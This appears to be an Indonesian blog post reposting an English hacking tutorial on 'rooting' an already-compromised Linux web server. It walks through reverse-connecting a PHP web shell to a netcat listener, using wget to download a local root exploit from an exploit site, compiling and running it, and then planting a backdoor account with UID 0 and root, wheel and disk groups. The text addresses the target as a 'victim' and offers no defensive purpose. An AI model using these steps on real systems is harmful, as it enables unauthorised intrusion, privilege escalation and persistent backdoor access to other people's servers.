Saya Akan Share TUTORIAL Tentang ROOTING SERVER
Mulai Tutorialnya
TUTORIAL :
Today im gonna tell u how to root a linux server.
This is going to be a short,HQ tutorial with pictures included (For better learining)
Things Required:
- Shelled site
- A Local root exploit
- NetCat
Step 1 - Gathering informations
Open up your .php shell.
I have mine for an example
Now you need to check what kernel your victim is using...
It should be something like
Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686
Next thing you wanna do is to look for a local root exploit.
Example mine is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.
For finding exploits u could search in sites like exploit-db, 1337day, th3-0utl4ws etc.. or simply google
Step 2 - Backconnecting to the server
For this you will need:
1) NetCat
2) Open port (Example. 443 I won't b teaching how to port forward, use Google if you don't know how!!)
So open your netcat and type:
-l -n -v -p 443
Hit "Enter"
Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".
Now it should connect to your netcat
I got something like this
Step 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1
There's 2 way of uploading:
1) Using shell uploader
2) Using 'wget' function (Requires backconnection)
I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:
Now it downloaded out exploit named "2.6.18-164.zip" on our server.
If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:
gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit
If you downloaded your exploit in zip file anyrandomname.zip type:
unzip anyrandomname.zip
If you completed all steps it's time to get root.
Type:
chmod 777 yourexploit'sname
With common sense where i typed "yourexploit'sname" you will type your exploit's name.
And one last final step is to run our exploit
./yourexploit'sname
To check if you got root type
id
or
whoami
Mine steps to root
Step 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2
Command explanations:
Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.
-u 0 -o - Set the value of user id to 0.
-g 0 - Set the initial group number or name to 0
-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M - 'home directory' not created for the user.
root2 - User name of the new user account.NOTE: Change root2 to your desired username.
Now you need to set a password for your username.
Type in next:
passwd Root2
(Root2 is your username)
See an example
[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
To check if you did alright
id root2
(Root2 is your username)
NetCat : Sogok Aku Mas :'(
GNY Shell : TUSBOL AKU MAS :'(
Tidak ada komentar:
Posting Komentar